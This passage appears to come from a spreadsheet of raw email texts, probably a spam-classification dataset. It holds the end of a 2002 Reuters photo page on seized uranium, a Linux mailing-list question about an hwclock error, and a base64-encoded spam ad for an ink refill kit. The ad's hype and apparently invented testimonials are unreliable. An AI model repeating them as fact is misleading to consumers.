 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;
 &lt;table width=585 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;
 &lt;td width=470&gt;
 &lt;center&gt;
 &lt;table width=1% cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
  &lt;img src=http://us.news2.yimg.com/us.yimg.com/p/nm/20020928/mdf116174.jpg align=middle border=1 alt="Captured weapons-grade uranium weighing more than 33 pounds is on display at the paramilitary police headquarters of southeast province of Sanliurfa, Turkey, September 28, 2002. Turkish gendarmes seized the uranium and detained two men accused of smuggling the material, Anatolian Agency said. Authorities believe the uranium came from an eastern European country and has a value about &amp;#36;5 million. (Anatolian via Reuters)" width=450 height=195&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=top&gt;
 &lt;td width=100% align=right&gt;
 &lt;span class=timedate&gt;Sat Sep 28,11:26 AM ET&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;
 &lt;td class=regblk&gt;
 &lt;br&gt;
 &lt;font size=-1&gt;
 Captured weapons-grade uranium weighing more than 33 pounds is on display at the paramilitary police headquarters of southeast province of Sanliurfa, Turkey, September 28, 2002. Turkish gendarmes seized the uranium and detained two men accused of smuggling the material, Anatolian Agency said. Authorities believe the uranium came from an eastern European country and has a value about &amp;#36;5 million. (Anatolian via Reuters)
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width=100% cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr valign=middle&gt;
 &lt;td&gt;&lt;center&gt;&lt;img src=http://us.i1.yimg.com/us.yimg.com/i/buzz/mail.gif width=16 height=16 align=top alt="Mail to Friend"&gt;&amp;nbsp;
 &lt;a href="http://mtf.news.yahoo.com/mailto?url=http%3a//story.news.yahoo.com/news%3ftmpl=story2%26u=/020928/161/2c9nb.html&amp;title=Reuters+Photo&amp;prop=dailynews&amp;locale=us"&gt;Email Photo&lt;/a&gt;&lt;/center&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;
 &lt;/center&gt;
 &lt;br&gt; 
 &lt;center&gt; 
 &lt;table width=420 cellpadding=3 cellspacing=0 border=0&gt; 
 &lt;tr valign=bottom&gt; 
 &lt;td valign=bottom&gt; 
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;&lt;tr valign=middle&gt; 
 &lt;td valign=bottom&gt;&lt;form action="http://search.news.yahoo.com/search/news"&gt; 
 &lt;/td&gt; 
 &lt;td nowrap valign=middle&gt;&lt;span class=regblks&gt;Search:&lt;/span&gt;&lt;/td&gt; 
 &lt;td nowrap&gt; &lt;select name=c&gt;&lt;option value=""&gt;News Stories&lt;option value=news_photos selected&gt;News Photos&lt;option value=av&gt;Audio/Video&lt;option value=fullcov&gt;Full Coverage&lt;option value=news_nytp&gt;New York Times&lt;option value=all&gt;All of Yahoo!&lt;/select&gt;&lt;/td&gt;&lt;td nowrap&gt;&amp;nbsp;&lt;span class=regblks&gt;for&lt;/span&gt;&amp;nbsp;&lt;/td&gt; 
 &lt;td nowrap valign=bottom&gt;&lt;input size=13 name=p value=""&gt; &lt;input type=submit value="Search"&gt; 
 &lt;/td&gt; 
 &lt;td&gt;&lt;/form&gt;&lt;/td&gt; 
 &lt;td valign=middle&gt; &lt;a class=regs href="http://search.news.yahoo.com/search/news/options?p="&gt;&lt;font face=arial size=-2 color=black&gt;Advanced&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;/table&gt; 
 &lt;/center&gt;
 &lt;/td&gt;
 &lt;td width=5&gt;&lt;/td&gt;
 &lt;td width=120&gt;
 &lt;center&gt;
 &lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=750 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td class=regsblk align=center&gt;
 &lt;hr width=750 size=1 noshade&gt;
 Copyright  2002 Reuters Limited. All rights reserved. Republication or redistribution of Reuters content is expressly prohibited without the prior written consent of Reuters. Reuters shall not be liable for any errors or delays in the content, or for any actions taken in reliance thereon.
 &lt;br&gt;
 &lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/center&gt; 
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] hwclock
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
 I've got a small problem but still annoying. I upgraded from RH 7.1 to 
 RH 7.3 and everything looks ok except that the time is ahead by one 
 hour. I've been looking the man files for hwclock and options but it 
 simply doesn't work, it gives the following error from he shell as well 
 as from the startup while loading the kernel:  hwclock: ioctl() to 
 /dev/rtc to turn on update interrupts failed unexpectedly, errno=25: 
 Inappropriate ioctl for device.
 .... my solution at the time is to enter the setup of the PC and reduce 
 the time by one hour (awful!)
 Regards,
 Felipe
 PRL, DCU
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Oh No! My Printer Died!
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C8_20D83C2D.E4417B07
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg
 VHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KICAgICAgICAg
 ICANCiAgPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250ZW50
 PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9SVNPLTg4NTktMSI+DQogIDx0aXRsZT5N
 aWdodHkgSmV0PC90aXRsZT4NCjwvaGVhZD4NCiAgPGJvZHk+DQogICAgIA0K
 PHRhYmxlIGNlbGxwYWRkaW5nPSIyIiBjZWxsc3BhY2luZz0iMiIgYm9yZGVy
 PSIwIiB3aWR0aD0iMTAwJSI+DQogICAgIDx0Ym9keT4NCiAgICAgICA8dHI+
 DQogICAgICAgICA8dGQgdmFsaWduPSJUb3AiIGJnY29sb3I9ImJsYWNrIj4g
 ICAgICAgICAgICAgICAgICAgICANCiAgICAgIDxkaXYgYWxpZ249IkNlbnRl
 ciI+PHU+PGI+PGZvbnQgY29sb3I9InJlZCIgc2l6ZT0iKzMiPldBUk5JTkc6
 PC9mb250PjwvYj48L3U+PC9kaXY+DQogICAgICAgICA8YnI+DQogICAgICAg
 ICAgICAgICAgICAgICAgIA0KICAgICAgPGRpdiBhbGlnbj0iQ2VudGVyIj48
 Zm9udCBjb2xvcj0iIzAwY2NjYyIgc2l6ZT0iKzIiPiAgRG8gbm90IGJ1eSBh
 bm90aGVyDQogIGluayBjYXJ0cmlkZ2UgdW50aWwgeW91IHJlYWQgdGhpcyE8
 YnI+DQogICAgICAgICA8L2ZvbnQ+PC9kaXY+DQogICAgICAgICAgICAgICAg
 ICAgICAgIA0KICAgICAgPGRpdiBhbGlnbj0iQ2VudGVyIj48Zm9udCBjb2xv
 cj0iI2ZmZmZmZiI+PGJyPg0KICAgICAgICAgPGZvbnQgc2l6ZT0iKzIiPiAg
 IFRpcmVkIG9mIHBheWluZyAkMjAsICQzMCwgJDQwIG9yIGV2ZW4gJDUwIGZv
 ciANCmlua2pldCAgICAgY2FydHJpZGdlcz88YnI+DQogICAgICAgICAgICAg
 VGlyZWQgb2YgeW91ciBwcmludGVyIHJ1bm5pbmcgb3V0IG9mIGluayBBR0FJ
 Tj88YnI+DQogICAgICAgICAgICAgICAgVGlyZWQgb2YgcnVubmluZyBmcm9t
 IHN0b3JlIHRvIHN0b3JlIGxvb2tpbmcgZm9yIHRoZSByaWdodA0KIGNhcnRy
 aWRnZT88YnI+DQogICAgICAgICAgICAgICAgVGlyZWQgb2YgaGF2aW5nIHRv
 IHdhaXQgdW50aWwgbW9ybmluZyB0byBnZXQgeW91ciBwcmludGVyIA0Kd29y
 a2luZz88YnI+DQogICAgICAgICAgICAgICAgSnVzdCBUaXJlZCBvZiBiZWlu
 ZyBUaXJlZD88L2ZvbnQ+PGJyPg0KICAgICAgICAgPC9mb250PjwvZGl2Pg0K
 ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgIDxkaXYgYWxpZ249IkNl
 bnRlciI+PGJyPg0KICAgICAgICAgPGZvbnQgc2l6ZT0iKzMiIGNvbG9yPSIj
 MzNmZjMzIj5ZT1UgTkVFRCBUSEU8L2ZvbnQ+PGJyPg0KICAgICAgICAgPGJy
 Pg0KICAgICAgICAgPC9kaXY+DQogICAgICAgICAgICAgICAgICAgICAgIA0K
 ICAgICAgPHRhYmxlIGJnY29sb3I9ImJsYWNrIj4NCiAgICAgICAgICAgICAg
 ICAgICAgICAgDQogICAgICA8L3RhYmxlPg0KICAgICAgICAgICAgICAgICAg
 ICAgICANCiAgICAgIDx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBj
 ZWxsc3BhY2luZz0iMiIgY2VsbHBhZGRpbmc9IjIiPg0KICAgICAgICAgICA8
 dGJvZHk+DQogICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgPHRk
 IHdpZHRoPSI1MCUiIHZhbGlnbj0iVG9wIj48aW1nIHNyYz0iaHR0cDovL3Bo
 ZXJvbW9uZS1sYWJzLmNvbS9pbWFnZXMvZmlsbC1qZXQuanBnIiBhbHQ9IkZp
 bGwtamV0IFBpY3R1cmUiIHdpZHRoPSI0NTIiIGhlaWdodD0iNTUyIj4NCiAg
 ICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICA8dGQgdmFsaWdu
 PSJUb3AiPiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
 IA0KICAgICAgICAgICAgPGRpdiBhbGlnbj0iTGVmdCI+ICAgICAgICAgICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICA8ZGl2
 IGFsaWduPSJDZW50ZXIiPjxmb250IGNvbG9yPSJyZWQiPjx1PjxiPjxmb250
 IHNpemU9IiszIj48YnI+DQogICAgICAgICAgICAgICA8L2ZvbnQ+PC9iPjxi
 cj4NCiAgICAgICAgICAgICAgIDwvdT48L2ZvbnQ+ICAgICAgICAgICAgICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICA8ZGl2IGFs
 aWduPSJMZWZ0Ij48Zm9udCBjb2xvcj0icmVkIj48dT48Zm9udCBzaXplPSIr
 MyI+PGI+PGJyPg0KICAgICAgICAgICAgICAgPGJyPg0KICAgICAgICAgICAg
 TUlHSFRZIEpFVCBJTksgUkVGSUxMIEtJVDwvYj48L2ZvbnQ+PC91PjwvZm9u
 dD48YnI+DQogICAgICAgICAgICAgICA8L2Rpdj4NCiAgICAgICAgICAgICAg
 IDxmb250IGNvbG9yPSJyZWQiPjxmb250IGNvbG9yPSIjZmZmZmZmIj48YnI+
 DQogICAgICAgICAgICAgICA8L2ZvbnQ+PC9mb250PiAgICAgICAgICAgICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgPGRpdiBh
 bGlnbj0iTGVmdCI+PGZvbnQgc2l6ZT0iKzIiIGNvbG9yPSIjZmZmZmZmIj4q
 IFJlZmlsbCBZb3VyIA0KIEluayAgICAgQ2FydHJpZGdlIFVQIFRPIDEwIFRJ
 TUVTISA8L2ZvbnQ+PGZvbnQgc2l6ZT0iKzIiIGNvbG9yPSIjZmZmZmZmIj48
 YnI+DQogICAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQgc2l6ZT0iKzIiIGNv
 bG9yPSIjZmZmZmZmIj4qIENsZWFuLCBTYWZlLCBhbmQNCkVhc3kgICAgdG8g
 IFVzZSAgICAgICA8YnI+DQogICAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQg
 c2l6ZT0iKzIiIGNvbG9yPSIjZmZmZmZmIj4qIEluZHVjdGlvbiBTZWFsZWQN
 CkJvdHRsZXMgICAgIFByZXZlbnRpbmcgTWVzc3kgU3BpbGxzIDwvZm9udD48
 Zm9udCBzaXplPSIrMiIgY29sb3I9IiNmZmZmZmYiPjxicj4NCiAgICAgICAg
 ICAgICAgIDwvZm9udD48Zm9udCBzaXplPSIrMiIgY29sb3I9IiNmZmZmZmYi
 PiogRnVsbHkgSWxsdXN0cmF0ZWQgDQpJbnN0cnVjdGlvbiAgICAgIEd1aWRl
 IDxicj4NCiAgICAgICAgICAgICAgIDwvZm9udD48Zm9udCBzaXplPSIrMiIg
 Y29sb3I9IiNmZmZmZmYiPiogRnVsbCBWaWRlbyBJbnN0cnVjdGlvbnMgDQog
 ICAgb24gIENELVJPTSZuYnNwOyA8YnI+DQogICAgICAgICAgICAgICA8L2Zv
 bnQ+PGZvbnQgc2l6ZT0iKzMiIGNvbG9yPSIjZmZmZmZmIj48Zm9udCBzaXpl
 PSIrMiI+KiBBbGwgDQogIHRoZSAgIFRvb2xzICBuZWVkZWQgdG8gUmVmaWxs
 IEFueSBUeXBlIG9mIElua2pldCBDYXJ0cmlkZ2UgPGJyPg0KICAgICAgICAg
 ICAgICAgPC9mb250Pjxicj4NCiAgICAgICAgICAgICAgIDwvZm9udD48L2Rp
 dj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
 DQogICAgICAgICAgICA8ZGl2IGFsaWduPSJDZW50ZXIiPjxicj4NCiAgICAg
 ICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgICAgPC9kaXY+DQogICAg
 ICAgICAgICAgICA8L2Rpdj4NCiAgICAgICAgICAgICAgIDwvdGQ+DQogICAg
 ICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
 DQogICAgICAgIDwvdGJvZHk+ICAgICAgICAgICAgICAgICAgICAgDQogICAg
 ICA8L3RhYmxlPg0KICAgICAgICAgPGJyPg0KICAgICAgICAgPGEgaHJlZj0i
 aHR0cDovL3BoZXJvbW9uZS1sYWJzLmNvbS9maWxsLWpldC5odG0iPjxmb250
 IHNpemU9IiszIj48YnI+DQogICAgICAgICA8L2ZvbnQ+PC9hPg0KICAgICAg
 ICAgICAgICAgICAgICAgICANCiAgICAgIDxjZW50ZXI+PGZvbnQgY29sb3I9
 IiMwMGNjY2MiIHNpemU9IiszIj5MZXQncyBDb21wYXJlIE1JR0hUWSBKRVQg
 dG8gT3RoZXIgDQogSW5rICBSZWZpbGwgICBLaXRzITwvZm9udD48YnI+DQog
 ICAgICAgICA8L2NlbnRlcj4NCiAgICAgICAgIDxicj4NCiAgICAgICAgICAg
 ICAgICAgICAgICAgDQogICAgICA8dGFibGUgY2VsbHBhZGRpbmc9IjIiIGNl
 bGxzcGFjaW5nPSIyIiBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIj4NCiAgICAg
 ICAgICAgPHRib2R5Pg0KICAgICAgICAgICAgIDx0cj4NCiAgICAgICAgICAg
 ICAgIDx0ZCB2YWxpZ249IlRvcCI+ICAgICAgICAgICAgICAgICAgICAgICAg
 ICAgICAgICAgICAgICAgDQogICAgICAgICAgICA8ZGl2IGFsaWduPSJMZWZ0
 Ij4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAg
 ICAgICAgICAgIDxkaXYgYWxpZ249IkNlbnRlciI+PGZvbnQgc2l6ZT0iKzMi
 IGNvbG9yPSJyZWQiPkdlbmVyaWMgUmVmaWxsIA0KIEtpdDxicj4NCiAgICAg
 ICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI2ZmZmZmZiI+PGJyPg0K
 ICAgICAgICAgICAgICAgPC9mb250Pjxmb250IHNpemU9IisxIiBjb2xvcj0i
 I2ZmZmZmZiI+UmVmaWxscyB5b3VyIEluayAgQ2FydHJpZGdlDQogICAgMi0z
 ICBUaW1lcy48YnI+DQogICAgICAgICAgICAgICA8YnI+DQogICAgICAgICAg
 ICBNZXNzeSBhbmQgc29tZXRpbWVzIGV2ZW4gREFOR0VST1VTIHRvIHVzZS48
 YnI+DQogICAgICAgICAgICAgICA8YnI+DQogICAgICAgICAgICBDb25mdXNp
 bmcgdG8gdXNlLCBubyBpbnN0cnVjdGlvbnMgSW5jbHVkZWQuPGJyPg0KICAg
 ICAgICAgICAgICAgPGJyPg0KICAgICAgICAgICAgT25seSByZWZpbGxzIHlv
 dXIgYmxhY2sgaW5rLjxicj4NCiAgICAgICAgICAgICAgIDxicj4NCiAgICAg
 ICAgICAgIFdvcmtzIG9ubHkgb24gc3BlY2lmaWMga2luZHMgb2YgSW5rIENh
 cnRyaWRnZXMuPGJyPg0KICAgICAgICAgICAgICAgPGJyPg0KICAgICAgICAg
 ICAgUmV0YWlscyBmb3IgJDQ5Ljk5KzcuOTkgUyZhbXA7SC48L2ZvbnQ+PGZv
 bnQgY29sb3I9IiNmZmZmZmYiPjxicj4NCiAgICAgICAgICAgICAgIDxicj4N
 CiAgICAgICAgICAgICAgIDwvZm9udD48Zm9udCBzaXplPSIrMSIgY29sb3I9
 IiNmZmZmZmYiPiAgICAgIFVzdWFsbHkgT2ZmZXJzDQogTk8gR3VhcmFudGVl
 LCAgdG91Z2ggbHVjayBpZiBpdCB3b24mIzgyMTc7dCB3b3JrITxicj4NCiAg
 ICAgICAgICAgICAgIDwvZm9udD48YnI+DQogICAgICAgICAgICAgICA8L2Rp
 dj4NCiAgICAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgICAgPC90
 ZD4NCiAgICAgICAgICAgICAgIDx0ZCB2YWxpZ249IlRvcCIgd2lkdGg9IjUw
 JSI+ICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgIA0K
 ICAgICAgICAgICAgPGRpdiBhbGlnbj0iQ2VudGVyIj48Zm9udCBjb2xvcj0i
 cmVkIiBzaXplPSIrMyI+TWlnaHR5LUpldCBSZWZpbGwgDQogS2l0PGJyPg0K
 ICAgICAgICAgICAgICAgPC9mb250PjwvZGl2Pg0KICAgICAgICAgICAgICAg
 PGJyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
 ICANCiAgICAgICAgICAgIDxkaXYgYWxpZ249IkNlbnRlciI+PGZvbnQgc2l6
 ZT0iKzEiPjxmb250IGNvbG9yPSIjZmZmZmZmIj5SZWZpbGxzIA0KIHlvdXIg
 ICAgIEluayBDYXJ0cmlkZ2UgPGZvbnQgY29sb3I9IiMzM2ZmMzMiPlVQIFRP
 IDEwIFRJTUVTITwvZm9udD48YnI+DQogICAgICAgICAgICAgICA8YnI+DQog
 ICAgICAgICAgICBDbGVhbiwgU2FmZSwgQW5kIDxmb250IGNvbG9yPSIjMzNm
 ZjMzIj5FYXN5IFRvIFVzZSE8L2ZvbnQ+PGJyPg0KICAgICAgICAgICAgICAg
 PGJyPg0KICAgICAgICAgICAgU2ltcGxlIHRvIHVzZSwgY29tZXMgd2l0aCA8
 Zm9udCBjb2xvcj0iIzMzZmYzMyI+aWxsdXN0cmF0ZWQgaW5zdHJ1Y3Rpb25z
 DQogICAgICBhbmQgYSBDRC1ST00hPC9mb250Pjxicj4NCiAgICAgICAgICAg
 ICAgIDxicj4NCiAgICAgICAgICAgIFJlZmlsbHMgPGZvbnQgY29sb3I9IiMz
 M2ZmMzMiPkJPVEg8L2ZvbnQ+IHlvdXIgQmxhY2sgSW5rIEFORA0KeW91ciAg
 IENvbG9yICAgSW5rITxicj4NCiAgICAgICAgICAgICAgIDxicj4NCiAgICAg
 ICAgICAgIFdvcmtzIG9uIDxmb250IGNvbG9yPSIjMzNmZjMzIj5BTEw8L2Zv
 bnQ+IEluayBDYXJ0cmlkZ2VzITxicj4NCiAgICAgICAgICAgICAgIDxicj4N
 CiAgICAgICAgICAgICAgIDxmb250IGNvbG9yPSIjMzNmZjMzIj4gICAgIE9u
 bHkgJDI5Ljk5ITwvZm9udD48YnI+DQogICAgICAgICAgICAgICA8YnI+DQog
 ICAgICAgICAgICBXZSBPZmZlciBhIDxmb250IGNvbG9yPSIjMzNmZjMzIj5M
 SUZFVElNRTwvZm9udD4gR3VhcmFudGVlISANCk5vICBRdWVzdGlvbnMgIEFz
 a2VkITwvZm9udD48YnI+DQogICAgICAgICAgICAgICA8YnI+DQogICAgICAg
 ICAgICAgICA8YnI+DQogICAgICAgICAgICAgICA8L2ZvbnQ+PC9kaXY+DQog
 ICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgIDwvdHI+DQogICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICA8L3Rib2R5PiAg
 ICAgICAgICAgICAgICAgICAgIA0KICAgICAgPC90YWJsZT4NCiAgICAgICAg
 IDxicj4NCiAgICAgICAgIDxicj4NCiAgICAgICAgICAgICAgICAgICAgICAg
 DQogICAgICA8ZGl2IGFsaWduPSJDZW50ZXIiPjxmb250IHNpemU9IiszIiBj
 b2xvcj0iIzAwY2NjYyI+SGVyZSBJcyBXaGF0IE91ciANCiBQcmV2aW91cyBD
 dXN0b21lcnMgIEhhdmUgVG8gU2F5ITwvZm9udD48YnI+DQogICAgICAgICA8
 YnI+DQogICAgICAgICA8L2Rpdj4NCiAgICAgICAgICAgICAgICAgICAgICAg
 DQogICAgICA8dGFibGUgY2VsbHBhZGRpbmc9IjIiIGNlbGxzcGFjaW5nPSIy
 IiBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIj4NCiAgICAgICAgICAgPHRib2R5
 Pg0KICAgICAgICAgICAgIDx0cj4NCiAgICAgICAgICAgICAgIDx0ZCB2YWxp
 Z249IlRvcCIgd2lkdGg9IjUwJSI+PGZvbnQgY29sb3I9IiNmZmZmZmYiPiJU
 aGFuaw0KeW91ICBmb3Igb2ZmZXJpbmcgc3VjaCBhIGdyZWF0IHByb2R1Y3Qu
 IEkndmUgYmVlbiB1c2luZyBpdCBub3cgZm9yIDMgbW9udGhzLCANCmFuZCAg
 SSBoYXZlIHJlZmlsbGVkIG15IHByaW50ZXIgY2FydHJpZGdlIDYgdGltZXMh
 IEFuZCB0aGVyZSBpcyBzdGlsbCBzb21lIA0KbGVmdCEgIFRoYW5rcyBBZ2Fp
 biEgICAgICAgPGI+LSBSb2JlcnQgWS4gaW4gVHVzY29uLCBBWjwvYj48YnI+
 DQogICAgICAgICAgICAgICA8YnI+DQogICAgICAuIlRvIFdob20gSXQgTWF5
 IENvbmNlcm46Jm5ic3A7IEkgZG9uJ3Qga25vdyBtdWNoIGFib3V0IHByaW50
 ZXJzIG9yIA0KaG93ICAgdG8gcmVmaWxsIGEgY2FydHJpZGdlLCBidXQgSSBo
 YWQgbm8gdHJvdWJsZSByZWZpbGxpbmcgbXkgSFAgY2FydHJpZGdlIA0Kd2l0
 aCAgIHlvdXIgcHJvZHVjdCEgVGhlIHZpZGVvIENELVJPTSB3YXMgYSBncmVh
 dCBoZWxwLCBpdCBleHBsYWluZWQgZXZlcnl0aGluZyEgDQogIE1hbnkgVGhh
 bmtzISA8Yj4tTGVzbGllIEEuIGluIE1hY29uLCBHQS48L2I+PGJyPg0KICAg
 ICAgICAgICAgICAgPGJyPg0KICAgICAgIkhlbGxvLCBJIGFtIGEgc21hbGwg
 YnVzaW5lc3Mgb3duZXIgYW5kIEkgcHJpbnQgb3V0IDEwMC0yMDAgcGFnZXMg
 b2YNCiB0ZXh0ICAgYSBkYXkuIEkgaGFkIHRvIGJ1eSAyIEluayBDYXJ0cmlk
 Z2VzIGV2ZXJ5IHdlZWssIGVhY2ggb2Ygd2hpY2ggY29zdGVkDQogYWJvdXQg
 ICAkNDAuIE5vdyBhbGwgSSBkbyBpcyBvcmRlciBmcm9tIHlvdXIgd2Vic2l0
 ZSBvbmNlIGEgbW9udGghIEkgZG9uJ3QNCiBldmVuIGhhdmUgIHRvIGdvIHRv
 IHRoZSBzdG9yZSB0byBidXkgaXQsIGl0J3Mgc2VudCByaWdodCB0byBteSBv
 ZmZpY2UhIFRoYW5rcw0KIGEgQnVuY2ghJm5ic3A7ICAgICAgICA8YnI+DQog
 ICAgICAgICAgICAgICA8Yj4tIEFkYW0gSi4gaW4gTHViYm9jaywgVFguIDwv
 Yj48YnI+DQogICAgICAgICAgICAgICA8YnI+DQogICAgICAgICAgICAgICA8
 YnI+DQogICAgICAgICAgICAgICA8L2ZvbnQ+PC90ZD4NCiAgICAgICAgICAg
 ICAgIDx0ZCB2YWxpZ249IlRvcCI+PGZvbnQgY29sb3I9IiNmZmZmZmYiPiJJ
 IGNhbid0IGJlbGlldmUgSSd2ZSANCiBiZWVuIHB1cmNoYXNpbmcgaW5rIGNh
 cnRyaWRnZSBhZnRlciBpbmsgY2FydHJpZGdlIGZvciAkMzAtJDQwIGVhY2gh
 IEF0IHlvdXIgDQogcHJpY2UgZWFjaCByZWZpbGwgaXMgY29zdGluZyBtZSBh
 Ym91dCAkNSEgSSdtIGdvaW5nIHRvIHVzZSB0aGUgbW9uZXkgSSBzYXZlZCAN
 CiB0byB0YWtlIG15IGdpcmxmcmllbmQgb3V0IHRvIGRpbm5lci4gVGhhbmsg
 eW91LiI8YnI+DQogICAgICAgICAgICAgICA8Yj4mbmJzcDstIENhcmwgTC4g
 aW4gSW5kaWFuYXBvbGlzLCBJTi48L2I+PGJyPg0KICAgICAgICAgICAgICAg
 PGJyPg0KICAgICAgIkRlYXIgU2lycywmbmJzcDsgQm95IHdhcyBJIHN1cnBy
 aXNlZCB3aXRoIHRoZSBxdWFsaXR5IG9mIHlvdXIgcHJvZHVjdA0KICBjb21w
 YXJlZCAgdG8gb3RoZXJzIG9uIHRoZSBtYXJrZXQuIFRoZSBmaXJzdCB0aW1l
 IEkgcmVmaWxsZWQgbXkgY2FydHJpZGdlDQogIGl0IG9ubHkgdG9vayAgNSBt
 aW51dGVzLCZuYnNwOyB3YXMgMTAwJSBlZmZlY3RpdmUsIGFuZCBJIGRpZG4n
 dCBldmVuIGhhdmUNCiAgdG8gd2FzaCBteSBoYW5kcyAgYWZ0ZXIhIEkgaGF2
 ZSBlbmNsb3NlZCBhIGNoZWNrIGZvciBhbiBhZGRpdGlvbmFsIDQgcmVmaWxs
 DQogIGtpdHMhIDxiPi0gVGhvbWFzICBTLiBpbiBEYXl0b24sIE9ILjwvYj48
 YnI+DQogICAgICAgICAgICAgICA8YnI+DQogICAgICAiSGV5IG1hbiB0aGlz
 IHJlZmlsbCBraXQgU0FWRUQgTVkgTElGRSEgSSBvcmRlcmVkIHlvdXIgcHJv
 ZHVjdCwgYnV0IA0Kd2hlbiAgIGl0IGFycml2ZWQgSSBoYWQgYSBsb3Qgb2Yg
 aW5rIGluIG15IGNhcnRyaWRnZS4mbmJzcDsgU28gSSBwdXQgaXQgYXNpZGUN
 CiBhbmQgICB0b3RhbGx5IGZvcmdvdCBhYm91dCBpdC4gVGhlIG5pZ2h0IGJl
 Zm9yZSBteSAyMCBwYWdlIHBhcGVyIHdhcyBkdWUsDQogSSB0cmllZCAgIHRv
 IHByaW50IGl0IG91dCwgYW5kIEkgaGFkIG5vIGluayBsZWZ0ISBCb3kgd2Fz
 IEkgd29ycmllZCwgdGhhdA0KIHdhcyB1bnRpbCAgIEkgcmVtZW1iZXJlZCBo
 b3cgSSBvcmRlcmVkIHlvdXIgUmVmaWxsIEtpdC4gSSBvcGVuZWQgaXQgdXAg
 YW5kDQogd2FzIHByaW50aW5nICAgbXkgcGFwZXIgaW4gc2Vjb25kcyEgVGhh
 bmtzISEhIiZuYnNwOyZuYnNwOyA8Yj4tIFRpbW90aHkNCmluICBMYW5jYXN0
 ZXIsIFBBLjxicj4NCiAgICAgICAgICAgICAgIDwvYj48YnI+DQogICAgICAg
 ICAgICAgICA8L2ZvbnQ+PC90ZD4NCiAgICAgICAgICAgICA8L3RyPg0KICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgPC90Ym9keT4g
 ICAgICAgICAgICAgICAgICAgICANCiAgICAgIDwvdGFibGU+DQogICAgICAg
 ICA8Zm9udCBjb2xvcj0iI2ZmZmZmZiI+PGJyPg0KICAgICAgICAgPC9mb250
 Pjxicj4NCiAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICA8ZGl2IGFs
 aWduPSJDZW50ZXIiPjxmb250IGNvbG9yPSIjMDBjY2NjIiBzaXplPSIrMyI+
 ICAgICAgICAgICAgICAgDQogICAgIA0KICAgICAgPGNlbnRlcj4mbmJzcDs8
 L2NlbnRlcj4NCiAgICAgICAgIDwvZm9udD48YnI+DQogICAgICAgICA8Zm9u
 dCBjb2xvcj0iIzAwY2NjYyIgc2l6ZT0iKzMiPldIQVQnUyBJTkNMVURFRD88
 L2ZvbnQ+PC9kaXY+DQogICAgICAgICA8YnI+DQogICAgICAgICAgICAgICAg
 ICAgICAgIA0KICAgICAgPHRhYmxlIGNlbGxwYWRkaW5nPSIyIiBjZWxsc3Bh
 Y2luZz0iMiIgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSI+DQogICAgICAgICAg
 IDx0Ym9keT4NCiAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICA8
 dGQgdmFsaWduPSJUb3AiPjxicj4NCiAgICAgICAgICAgICAgIDxicj4NCiAg
